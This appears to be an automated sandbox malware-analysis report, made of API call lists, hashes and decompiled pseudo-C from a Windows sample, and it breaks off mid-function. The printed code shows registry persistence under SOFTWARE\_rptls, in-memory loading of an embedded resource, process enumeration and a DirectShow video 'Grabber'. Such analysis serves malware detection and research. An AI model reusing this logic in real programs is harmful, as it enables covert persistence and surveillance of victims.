                                      • RegCreateKeyExW.ADVAPI32(80000001,SOFTWARE\_rptls,00000000,00000000,00000000,000F003F,00000000,?,?,?,?,?,?,0043F87F), ref: 0043F80D
                                      • lstrlenW.KERNEL32(004468A8,?,?,?,?,0043F87F,?,?,?,?,0043535D,?,00000000,00000000), ref: 0043F819
                                      • RegSetValueExW.ADVAPI32(?,Install,00000000,00000001,004468A8,00000000,?,?,?,?,0043F87F,?,?,?,?,0043535D), ref: 0043F82F
                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,0043F87F,?,?,?,?,0043535D,?,00000000,00000000), ref: 0043F838
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseCreateOpenValuelstrlen
                                      • String ID: Install$SOFTWARE\_rptls
                                      • API String ID: 2036214137-3226779556
                                      • Opcode ID: 933b09be1a8b168930d57f881ae5b0c7794c90dc0d6e96d028299f2ad7556ca5
                                      • Instruction ID: a23cb4388e9a69d3f24dc5d69ce0971f8c90b391210e0cbf3509f2e48584d1ec
                                      • Opcode Fuzzy Hash: 933b09be1a8b168930d57f881ae5b0c7794c90dc0d6e96d028299f2ad7556ca5
                                      • Instruction Fuzzy Hash: AFF04976500118BFE7209B96ED4DEEB7EBCEFC7791B51007ABA05E1010D6A55E00D6B8
                                      Uniqueness

                                      Uniqueness Score: 10.55%

                                      C-Code - Quality: 88%
                                      			E0043F843(void* __ebx, void* __ecx, void* __eflags) {
                                      				long _t2;
                                      				void* _t8;
                                      				struct HINSTANCE__* _t13;
                                      				void* _t15;
                                      				struct HRSRC__* _t18;
                                      
                                      				_t15 = __ecx;
                                      				E00431052(0x4468a8, 0, 0x208);
                                      				_t2 = GetModuleFileNameW(0, 0x4468a8, 0x208);
                                      				__imp__#680();
                                      				if(_t2 == 0 && E0043DB97() != 1) {
                                      					E0043F7D0(_t15);
                                      					_t13 = E0043FBFC();
                                      					_t18 = FindResourceW(_t13, 0x66, L"WM_DSP");
                                      					_t8 = LoadResource(_t13, _t18);
                                      					SizeofResource(_t13, _t18);
                                      					if(LockResource(_t8) != 0) {
                                      						E0043F73D(_t10);
                                      					}
                                      				}
                                      				return 0;
                                      			}

                                      APIs
                                      • GetModuleFileNameW.KERNEL32(00000000,004468A8,00000208,00000000,00000000,?,?,?,0043535D,?,00000000,00000000,?,?,?,00000000), ref: 0043F85F
                                      • IsUserAnAdmin.SHELL32 ref: 0043F865
                                        • Part of subcall function 0043DB97: GetCurrentProcess.KERNEL32(00000008,00000000,?,?,?,00000000), ref: 0043DBA9
                                        • Part of subcall function 0043DB97: OpenProcessToken.ADVAPI32(00000000,?,?,?,00000000), ref: 0043DBB0
                                        • Part of subcall function 0043DB97: GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,00000000), ref: 0043DBCE
                                        • Part of subcall function 0043DB97: CloseHandle.KERNEL32(00000000), ref: 0043DBE3
                                        • Part of subcall function 0043F7D0: RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\_rptls,00000000,000F003F,?,00000208,004468A8,?,?,?,?,0043F87F), ref: 0043F7F0
                                        • Part of subcall function 0043F7D0: RegCreateKeyExW.ADVAPI32(80000001,SOFTWARE\_rptls,00000000,00000000,00000000,000F003F,00000000,?,?,?,?,?,?,0043F87F), ref: 0043F80D
                                        • Part of subcall function 0043F7D0: lstrlenW.KERNEL32(004468A8,?,?,?,?,0043F87F,?,?,?,?,0043535D,?,00000000,00000000), ref: 0043F819
                                        • Part of subcall function 0043F7D0: RegSetValueExW.ADVAPI32(?,Install,00000000,00000001,004468A8,00000000,?,?,?,?,0043F87F,?,?,?,?,0043535D), ref: 0043F82F
                                        • Part of subcall function 0043F7D0: RegCloseKey.ADVAPI32(?,?,?,?,?,0043F87F,?,?,?,?,0043535D,?,00000000,00000000), ref: 0043F838
                                        • Part of subcall function 0043FBFC: MessageBoxA.USER32(00000000,Settings not found !,DEBUG,00000000), ref: 0043FC14
                                      • FindResourceW.KERNEL32(00000000,00000066,WM_DSP), ref: 0043F88E
                                      • LoadResource.KERNEL32(00000000,00000000,?,?,?,?,0043535D,?,00000000,00000000,?,?,?,00000000), ref: 0043F898
                                      • SizeofResource.KERNEL32(00000000,00000000,?,?,?,?,0043535D,?,00000000,00000000,?,?,?,00000000), ref: 0043F8A2
                                      • LockResource.KERNEL32(00000000,?,?,?,?,0043535D,?,00000000,00000000,?,?,?,00000000,?,?,00000000), ref: 0043F8A9
                                        • Part of subcall function 0043F73D: VirtualProtect.KERNEL32(00000000,000007D0,00000040,00000000,00000000,00000000,?,00000000,?,0043F8BB,?,?,?,0043535D,?,00000000), ref: 0043F77B
                                        • Part of subcall function 0043F73D: VirtualAlloc.KERNEL32(00000000,000001FE,00001000,00000040,?,00000000,?,0043F8BB,?,?,?,0043535D,?,00000000,00000000), ref: 0043F78F
                                        • Part of subcall function 0043F73D: GetWindowsDirectoryW.KERNEL32(00000000,00000104,?,00000000,?,0043F8BB,?,?,?,0043535D,?,00000000,00000000,?,?,?), ref: 0043F79D
                                        • Part of subcall function 0043F73D: lstrlenW.KERNEL32(00000000,\System32\cmd.exe,00000028,?,00000000,?,0043F8BB,?,?,?,0043535D,?,00000000,00000000), ref: 0043F7AB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Resource$CloseOpenProcessTokenVirtuallstrlen$AdminAllocCreateCurrentDirectoryFileFindHandleInformationLoadLockMessageModuleNameProtectSizeofUserValueWindows
                                      • String ID: WM_DSP
                                      • API String ID: 1126923897-506093727
                                      • Opcode ID: 2ce587da833a5332d837c24db7ceec7269d8d62c21a0719195cd0562a892b368
                                      • Instruction ID: 92b0bf4d33d3164a60508a7a20e6a4243c03f592821922342082d42ea90b31a1
                                      • Opcode Fuzzy Hash: 2ce587da833a5332d837c24db7ceec7269d8d62c21a0719195cd0562a892b368
                                      • Instruction Fuzzy Hash: 1AF06276A0025067E72437766C4DF5F2A6C9FCB711F421436F505E6252DBAC8C41867D
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      C-Code - Quality: 68%
                                      			E0043582B(void* __ecx) {
                                      				_Unknown_base(*)()* _t2;
                                      				void* _t4;
                                      
                                      				_t4 = __ecx;
                                      				_t2 = GetProcAddress(LoadLibraryA("USER32.DLL"), "MessageBoxA");
                                      				if(_t4 == 0) {
                                      					if(_t2 != 0) {
                                      						_t2 =  *_t2(0, "An assertion condition failed", "Assert", 0x2010);
                                      					}
                                      					ExitProcess(1);
                                      				}
                                      				return _t2;
                                      			}

                                      APIs
                                      • LoadLibraryA.KERNEL32(USER32.DLL), ref: 00435833
                                      • GetProcAddress.KERNEL32(00000000,MessageBoxA,?,00000000,?,?,?,?,?,?,?,004355EF,?,00000000,.bss,00000000), ref: 0043583F
                                      • ExitProcess.KERNEL32 ref: 00435863
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressExitLibraryLoadProcProcess
                                      • String ID: An assertion condition failed$Assert$MessageBoxA$USER32.DLL
                                      • API String ID: 881411216-1361702557
                                      • Opcode ID: 15b455a85311c8f954ec6b043a2c2e6ccd6960b5f3782e624350d83a2cfe0c94
                                      • Instruction ID: acf4e4984b6a7741b49bbccdce677fa351c24c0411e6152029d0fc86d2c82444
                                      • Opcode Fuzzy Hash: 15b455a85311c8f954ec6b043a2c2e6ccd6960b5f3782e624350d83a2cfe0c94
                                      • Instruction Fuzzy Hash: 8ED05E707C03003AFE1037A01F0AF6A2A689B26F02FA81922BB40A60C2C9D94450812D
                                      Uniqueness

                                      Uniqueness Score: 10.55%

                                      C-Code - Quality: 68%
                                      			E00435AF2() {
                                      				_Unknown_base(*)()* _t2;
                                      
                                      				_t2 = GetProcAddress(LoadLibraryA("USER32.DLL"), "MessageBoxA");
                                      				if(_t2 != 0) {
                                      					 *_t2(0, "A pure virtual function was called. This is a fatal error, and indicates a serious error in the implementation of the application", "PureCall", 0x2010);
                                      				}
                                      				ExitProcess(1);
                                      			}

                                      APIs
                                      • LoadLibraryA.KERNEL32(USER32.DLL), ref: 00435AF7
                                      • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 00435B03
                                      • ExitProcess.KERNEL32 ref: 00435B22
                                      Strings
                                      • USER32.DLL, xrefs: 00435AF2
                                      • PureCall, xrefs: 00435B12
                                      • A pure virtual function was called. This is a fatal error, and indicates a serious error in the implementation of the application, xrefs: 00435B17
                                      • MessageBoxA, xrefs: 00435AFD
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressExitLibraryLoadProcProcess
                                      • String ID: A pure virtual function was called. This is a fatal error, and indicates a serious error in the implementation of the application$MessageBoxA$PureCall$USER32.DLL
                                      • API String ID: 881411216-4134947204
                                      • Opcode ID: 6aadc18dd1cfe4ad3c1e9b2468a78b8f0e6b8b1ab637586429db80bb92e1c5d0
                                      • Instruction ID: 778c715a780ef77a6bdf08f1dc1ea72b1e932459f482c230eb6d2bf8d458d404
                                      • Opcode Fuzzy Hash: 6aadc18dd1cfe4ad3c1e9b2468a78b8f0e6b8b1ab637586429db80bb92e1c5d0
                                      • Instruction Fuzzy Hash: 2AD0E9343803056AF6543BA16F1EF6D2924AB19F02FD44936B705B40D2C9E9A550862D
                                      Uniqueness

                                      Uniqueness Score: 10.55%

                                      C-Code - Quality: 85%
                                      			E0043ECC2(void* __ecx, void* __edx, void* __eflags) {
                                      				char _v8;
                                      				char _v12;
                                      				char _v16;
                                      				signed int _v20;
                                      				signed int _v24;
                                      				signed int _v28;
                                      				intOrPtr _v32;
                                      				int _v36;
                                      				intOrPtr _v40;
                                      				int _v44;
                                      				char _v568;
                                      				long _v596;
                                      				char _v600;
                                      				void* _v604;
                                      				char _v1644;
                                      				intOrPtr _t49;
                                      				int _t54;
                                      				struct tagPROCESSENTRY32W* _t57;
                                      				int _t73;
                                      				int _t77;
                                      				int _t89;
                                      				void* _t91;
                                      				void* _t112;
                                      				void* _t113;
                                      				void* _t115;
                                      				void* _t117;
                                      				signed int _t119;
                                      				void* _t120;
                                      				signed int _t122;
                                      				void* _t123;
                                      				intOrPtr* _t124;
                                      				void* _t125;
                                      
                                      				_t125 = __eflags;
                                      				_t112 = __edx;
                                      				_t91 = __ecx;
                                      				E00431052( &_v600, 0, 0x228);
                                      				_t124 = _t123 + 0xc;
                                      				_v604 = 0x22c;
                                      				_v36 = 0;
                                      				_t49 = 5;
                                      				_v32 = _t49;
                                      				_v40 = _t49;
                                      				E00431683( &_v44, _t125);
                                      				_t113 = CreateToolhelp32Snapshot(2, 0);
                                      				if(_t113 == 0xffffffff) {
                                      					L14:
                                      					E004312BA(_t91, __eflags,  &_v44);
                                      					_t54 = _v44;
                                      					__eflags = _t54;
                                      					if(_t54 != 0) {
                                      						_t119 =  *(_t54 - 4);
                                      						_t115 = _t119 * 0xc + _t54;
                                      						__eflags = _t119;
                                      						if(_t119 != 0) {
                                      							do {
                                      								_t115 = _t115 - 0xc;
                                      								E004313B6(_t115);
                                      								_t119 = _t119 - 1;
                                      								__eflags = _t119;
                                      							} while (_t119 != 0);
                                      						}
                                      					}
                                      				} else {
                                      					_t57 =  &_v604;
                                      					Process32FirstW(_t113, _t57);
                                      					_t127 = _t57;
                                      					if(_t57 != 0) {
                                      						do {
                                      							_v16 = _v596;
                                      							_v12 = 0;
                                      							_v8 = 0;
                                      							E0043312C( &_v12, _t112,  &_v568);
                                      							_t120 = OpenProcess(0x1410, 0, _v596);
                                      							__eflags = _t120 - 0xffffffff;
                                      							if(_t120 == 0xffffffff) {
                                      								E00433264( &_v8, E00433412( &_v28, "-"));
                                      								E00435A2D(_v28);
                                      								_t34 =  &_v28;
                                      								 *_t34 = _v28 & 0x00000000;
                                      								__eflags =  *_t34;
                                      							} else {
                                      								E00431052( &_v1644, 0, 0x410);
                                      								_t124 = _t124 + 0xc;
                                      								_t77 =  &_v1644;
                                      								__imp__GetModuleFileNameExW(_t120, 0, _t77, 0x208);
                                      								__eflags = _t77;
                                      								if(_t77 == 0) {
                                      									E00433264( &_v8, E00433412( &_v24, "-"));
                                      									E00435A2D(_v24);
                                      									_t29 =  &_v24;
                                      									 *_t29 = _v24 & 0x00000000;
                                      									__eflags =  *_t29;
                                      								} else {
                                      									E00433264( &_v8, E00433412( &_v20,  &_v1644));
                                      									E00435A2D(_v20);
                                      									_v20 = _v20 & 0x00000000;
                                      								}
                                      								CloseHandle(_t120);
                                      							}
                                      							_t124 = _t124 - 0xc;
                                      							_t121 = _t124;
                                      							 *_t124 = _v16;
                                      							E0043345A(_t121 + 4,  &_v12);
                                      							E0043345A(_t121 + 8,  &_v8);
                                      							E00431560( &_v44);
                                      							E004313B6( &_v16);
                                      							_t73 = Process32NextW(_t113,  &_v604);
                                      							_push(0);
                                      							_pop(0);
                                      							__eflags = _t73;
                                      						} while (__eflags != 0);
                                      						CloseHandle(_t113);
                                      						goto L14;
                                      					} else {
                                      						CloseHandle(_t113);
                                      						E004312BA(_t91, _t127,  &_v44);
                                      						_t89 = _v44;
                                      						if(_t89 != 0) {
                                      							_t122 =  *(_t89 - 4);
                                      							_t117 = _t122 * 0xc + _t89;
                                      							if(_t122 != 0) {
                                      								do {
                                      									_t117 = _t117 - 0xc;
                                      									E004313B6(_t117);
                                      									_t122 = _t122 - 1;
                                      								} while (_t122 != 0);
                                      							}
                                      						}
                                      					}
                                      				}
                                      				return _t91;
                                      			}

                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0043ED08
                                      • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0043ED21
                                      • CloseHandle.KERNEL32(00000000), ref: 0043ED2C
                                        • Part of subcall function 00433412: lstrlenW.KERNEL32(0043FC61,00000000,?,0043FC61,00000000,?,00000000), ref: 0043341B
                                        • Part of subcall function 00433412: lstrlenW.KERNEL32(0043FC61,?,0043FC61,00000000,?,00000000), ref: 00433432
                                        • Part of subcall function 00433412: lstrcpyW.KERNEL32(?,0043FC61), ref: 0043344D
                                        • Part of subcall function 00433264: lstrcpyW.KERNEL32(00000000,00000000), ref: 00433289
                                        • Part of subcall function 00435A2D: VirtualFree.KERNELBASE(00000000,00000000,00008000,0043E2AE,?,?,?,?,?,00000000), ref: 00435A35
                                      • OpenProcess.KERNEL32(00001410,00000000,?,?), ref: 0043ED96
                                      • GetModuleFileNameExW.PSAPI(00000000,00000000,?,00000208), ref: 0043EDCC
                                      • CloseHandle.KERNEL32(00000000), ref: 0043EE1F
                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 0043EE83
                                      • CloseHandle.KERNEL32(00000000), ref: 0043EE95
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
• Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp
• Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp
• Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp
• Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseHandle$Process32lstrcpylstrlen$CreateFileFirstFreeModuleNameNextOpenProcessSnapshotToolhelp32Virtual
                                      • String ID:
                                      • API String ID: 3514491001-0
                                      • Opcode ID: b96bc3a2db991f8fb6f0ad84535f018366c4b9fc661b03ef3fa1918d4617a1b4
                                      • Instruction ID: ca3e8b645e29a8fdb8d7813faec3b1b3042788899ce31f3bdb840681be9bfdce
                                      • Opcode Fuzzy Hash: b96bc3a2db991f8fb6f0ad84535f018366c4b9fc661b03ef3fa1918d4617a1b4
                                      • Instruction Fuzzy Hash: 0F51B372D011199BDB10EBA1CD8AAEFBB78AF48715F01116AF401B32D1DB785F45CB98
                                      Uniqueness

                                      Uniqueness Score: 5.06%

                                      C-Code - Quality: 55%
                                      			E00440AD0(signed int __ecx, signed int _a4) {
                                      				intOrPtr _v38;
                                      				intOrPtr _v44;
                                      				intOrPtr _v48;
                                      				void* _v112;
                                      				char _v128;
                                      				intOrPtr _v132;
                                      				char _v200;
                                      				intOrPtr _t49;
                                      				intOrPtr* _t54;
                                      				intOrPtr* _t58;
                                      				intOrPtr* _t60;
                                      				intOrPtr* _t71;
                                      				signed int _t76;
                                      				intOrPtr* _t78;
                                      				intOrPtr* _t79;
                                      				intOrPtr* _t80;
                                      				intOrPtr* _t85;
                                      				signed int _t91;
                                      				intOrPtr* _t96;
                                      				intOrPtr* _t97;
                                      				intOrPtr* _t104;
                                      				signed int _t107;
                                      				intOrPtr* _t111;
                                      				intOrPtr* _t112;
                                      				intOrPtr* _t113;
                                      				intOrPtr* _t118;
                                      				void* _t119;
                                      				void* _t120;
                                      				void* _t121;
                                      
                                      				_t76 = __ecx;
                                      				__imp__CoInitialize(0);
                                      				_t1 = _t76 + 0x18; // 0x1209a8
                                      				_t111 = _t1;
                                      				__imp__CoCreateInstance(0x442560, 0, 1, 0x444854, _t111);
                                      				_t78 =  *_t111;
                                      				if(_t78 != 0) {
                                      					_t2 = _t76 + 0x1c; // 0x1209ac
                                      					_t104 = _t2;
                                      					_t49 =  *((intOrPtr*)( *_t78))(_t78, 0x442540, _t104);
                                      					_t79 =  *_t104;
                                      					if(_t79 != 0) {
                                      						_t49 =  *((intOrPtr*)( *_t79 + 4))(_t79);
                                      						_t4 = _t76 + 0x20; // 0x1209b0
                                      						_t112 = _t4;
                                      						if(_t112 != 0) {
                                      							_t49 = E00440831(_a4, _t112);
                                      						}
                                      						if( *_t112 != 0) {
                                      							_t6 = _t76 + 0x24; // 0x1209b4
                                      							_t113 = _t6;
                                      							__imp__CoCreateInstance(0x4425b0, 0, 1, 0x444844, _t113);
                                      							_t80 =  *_t113;
                                      							if(_t80 != 0) {
                                      								_t7 = _t76 + 0x20; // 0x0
                                      								 *((intOrPtr*)( *_t80 + 0xc))(_t80,  *_t7, L"Source");
                                      								_t54 =  *_t113;
                                      								 *((intOrPtr*)( *_t54 + 0xc))(_t54,  *_t104, L"Grabber");
                                      								E00431052( &_v128, 0, 0x48);
                                      								_t11 = _t76 + 0x18; // 0x0
                                      								_t58 =  *_t11;
                                      								_t121 = _t120 + 0xc;
                                      								asm("movsd");
                                      								asm("movsd");
                                      								asm("movsd");
                                      								asm("movsd");
                                      								asm("movsd");
                                      								asm("movsd");
                                      								asm("movsd");
                                      								asm("movsd");
                                      								 *((intOrPtr*)( *_t58 + 0x10))(_t58,  &_v128);
                                      								_t49 = E0044044E();
                                      								 *((intOrPtr*)(_t76 + 0x28)) = _t49;
                                      								if(_t49 != 0) {
                                      									_t49 = E0044046A();
                                      									 *((intOrPtr*)(_t76 + 0x2c)) = _t49;
                                      									if(_t49 != 0) {
                                      										_t20 = _t76 + 0x24; // 0x0
                                      										_t85 =  *_t20;
                                      										_t21 = _t76 + 0x28; // 0x0
                                      										_t49 =  *((intOrPtr*)( *_t85 + 0x2c))(_t85,  *_t21, _t49);
                                      										if(_t49 >= 0) {
                                      											_t23 = _t76 + 0x18; // 0x0
                                      											_t60 =  *_t23;
                                      											 *((intOrPtr*)( *_t60 + 0x14))(_t60,  &_v200);
                                      											E0043102C(_t119 + _v132 + 0x30 - _v132 - 0x60, _v132 + 0x30, 0x28);
                                      											E004402B1( &_v200);
                                      											_t107 = _a4;
                                      											E004408F0(_t76, _v132 + 0x30, _t107, _v44, _v48, _v38);
                                      											_t35 = _t76 + 0xc; // 0x0
                                      											E0043582B(_t76 & 0xffffff00 | _t107 -  *_t35 > 0x00000000);
                                      											_t38 = _t76 + 4; // 0x112c88
                                      											_t91 = 7;
                                      											memcpy(_t121 + 0xc - 0x1c,  *( *_t38 + _t107 * 4), _t91 << 2);
                                      											E0044039E( *_t76);
                                      											_t49 = E0044044E();
                                      											 *((intOrPtr*)(_t76 + 0x30)) = _t49;
                                      											if(_t49 != 0) {
                                      												_t44 = _t76 + 0x18; // 0x0
                                      												_t71 =  *_t44;
                                      												 *((intOrPtr*)( *_t71 + 0x24))(_t71,  *_t76, 0);
                                      												_t46 = _t76 + 0x24; // 0x0
                                      												_t96 =  *_t46;
                                      												_t47 = _t76 + 0x34; // 0x1209c4
                                      												_t118 = _t47;
                                      												_t49 =  *((intOrPtr*)( *_t96))(_t96, 0x442580, _t118);
                                      												_t97 =  *_t118;
                                      												if(_t97 != 0) {
                                      													return  *((intOrPtr*)( *_t97 + 0x1c))(_t97);
                                      												}
                                      											}
                                      										}
                                      									}
                                      								}
                                      							}
                                      						}
                                      					}
                                      				}
                                      				return _t49;
                                      			}

                                      APIs
                                      • CoInitialize.OLE32(00000000), ref: 00440AE0
                                      • CoCreateInstance.OLE32(00442560,00000000,00000001,00444854,001209A8), ref: 00440AF8
                                      • CoCreateInstance.OLE32(004425B0,00000000,00000001,00444844,001209B4), ref: 00440B52
                                        • Part of subcall function 00440831: CoCreateInstance.OLE32(004425A0,00000000,00000001,00444834,?), ref: 0044085F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
• Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp
• Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp
• Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp
• Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateInstance$Initialize
                                      • String ID: Grabber$Source$vids
                                      • API String ID: 1108742289-4200688928
                                      • Opcode ID: adc9f8b96fb2596398f77022739ba8fd2f647b69e6f6934fc4722176219b013d
                                      • Instruction ID: 13f216fd7b968e1d8d38fac112b5de3fbb5572a4b90e919e19bccb472efca4d4
                                      • Opcode Fuzzy Hash: adc9f8b96fb2596398f77022739ba8fd2f647b69e6f6934fc4722176219b013d
                                      • Instruction Fuzzy Hash: 71518E71600200AFEB28DF64C895F5A3776BF49704F2145ADFE059F295CBB9E811CB94
                                      Uniqueness

                                      Uniqueness Score: 10.55%

                                      APIs
                                      • GetConsoleCP.KERNEL32 ref: 00CCAC7B
                                      • __fassign.LIBCMT ref: 00CCACFA
                                      • __fassign.LIBCMT ref: 00CCAD19
                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00CCAD46
                                      • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00CCAD66
                                      • WriteFile.KERNEL32(?,00CCD148,00000001,?,00000000), ref: 00CCADA0
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.578723047.00CC1000.00000020.00020000.sdmp, Offset: 00CC0000, based on PE: true
• Associated: 00000003.00000002.578708562.00CC0000.00000002.00020000.sdmp
• Associated: 00000003.00000002.578805483.00CE2000.00000002.00020000.sdmp
• Associated: 00000003.00000002.578834966.00CEB000.00000004.00020000.sdmp
• Associated: 00000003.00000002.578847102.00CEC000.00000008.00020000.sdmp
• Associated: 00000003.00000002.578856272.00CED000.00000004.00020000.sdmp
• Associated: 00000003.00000002.578871909.00CEF000.00000008.00020000.sdmp
• Associated: 00000003.00000002.578928306.00D80000.00000004.00020000.sdmp
• Associated: 00000003.00000002.578946601.00D81000.00000008.00020000.sdmp
• Associated: 00000003.00000002.578962758.00D84000.00000004.00020000.sdmp
• Associated: 00000003.00000002.578971084.00D85000.00000008.00020000.sdmp
• Associated: 00000003.00000002.578988900.00D87000.00000004.00020000.sdmp
• Associated: 00000003.00000002.579002903.00D89000.00000008.00020000.sdmp
• Associated: 00000003.00000002.579026291.00D8D000.00000004.00020000.sdmp
• Associated: 00000003.00000002.579044316.00D8E000.00000008.00020000.sdmp
• Associated: 00000003.00000002.579062903.00D91000.00000004.00020000.sdmp
• Associated: 00000003.00000002.579083023.00D93000.00000002.00020000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_cc0000_images.jbxd
                                      Similarity
                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                      • String ID:
                                      • API String ID: 1324828854-0
                                      • Opcode ID: e94a8f72bb0f9f93bb975672e29a17ca3604296bfb3da30b5064899f7d4f63ba
                                      • Instruction ID: 447500d78e8bac00f6ff09e858e0fed96f544caf7c1599f1e681e8fb0feb284f
                                      • Opcode Fuzzy Hash: e94a8f72bb0f9f93bb975672e29a17ca3604296bfb3da30b5064899f7d4f63ba
                                      • Instruction Fuzzy Hash: 95517C71A0024DAFCB10CFA8D895FEEBBF8EF09315F14416AE556E7291D7309A41CB61
                                      Uniqueness

                                      Uniqueness Score: 0.61%

                                      APIs
                                      • _ValidateLocalCookies.LIBCMT ref: 00CC1DFB
                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 00CC1E03
                                      • _ValidateLocalCookies.LIBCMT ref: 00CC1E91
                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 00CC1EBC
                                      • _ValidateLocalCookies.LIBCMT ref: 00CC1F11
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.578723047.00CC1000.00000020.00020000.sdmp, Offset: 00CC0000, based on PE: true
• Associated: 00000003.00000002.578708562.00CC0000.00000002.00020000.sdmp
• Associated: 00000003.00000002.578805483.00CE2000.00000002.00020000.sdmp
• Associated: 00000003.00000002.578834966.00CEB000.00000004.00020000.sdmp
• Associated: 00000003.00000002.578847102.00CEC000.00000008.00020000.sdmp
• Associated: 00000003.00000002.578856272.00CED000.00000004.00020000.sdmp
• Associated: 00000003.00000002.578871909.00CEF000.00000008.00020000.sdmp
• Associated: 00000003.00000002.578928306.00D80000.00000004.00020000.sdmp
• Associated: 00000003.00000002.578946601.00D81000.00000008.00020000.sdmp
• Associated: 00000003.00000002.578962758.00D84000.00000004.00020000.sdmp
• Associated: 00000003.00000002.578971084.00D85000.00000008.00020000.sdmp
• Associated: 00000003.00000002.578988900.00D87000.00000004.00020000.sdmp
• Associated: 00000003.00000002.579002903.00D89000.00000008.00020000.sdmp
• Associated: 00000003.00000002.579026291.00D8D000.00000004.00020000.sdmp
• Associated: 00000003.00000002.579044316.00D8E000.00000008.00020000.sdmp
• Associated: 00000003.00000002.579062903.00D91000.00000004.00020000.sdmp
• Associated: 00000003.00000002.579083023.00D93000.00000002.00020000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_cc0000_images.jbxd
                                      Similarity
                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                      • String ID: csm
                                      • API String ID: 1170836740-1018135373
                                      • Opcode ID: 855a253c167d6e5e374bdf220d3807d50bb698aca29ea0d7ee9e65d24700ca57
                                      • Instruction ID: a7b8156b0052d3f77d002d11581460435204d6961d37aa71c63d30ea3b071be9
                                      • Opcode Fuzzy Hash: 855a253c167d6e5e374bdf220d3807d50bb698aca29ea0d7ee9e65d24700ca57
                                      • Instruction Fuzzy Hash: 4441B670A002089BCF14DF5AC884FAEBBA5AF46324F18815DEC259B353D731DE05CB90
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      C-Code - Quality: 95%
                                      			E00432B29(void* __ecx, void* __edx, void* __eflags) {
                                      				char _v12;
                                      				char _v16;
                                      				char _v20;
                                      				char _v24;
                                      				char _v76;
                                      				char _v344;
                                      				short _v864;
                                      				void* __edi;
                                      				void* _t28;
                                      				void* _t32;
                                      				void* _t35;
                                      				void* _t36;
                                      				void* _t37;
                                      				void* _t54;
                                      				void* _t75;
                                      				void* _t76;
                                      				void* _t81;
                                      				void* _t82;
                                      				void* _t84;
                                      
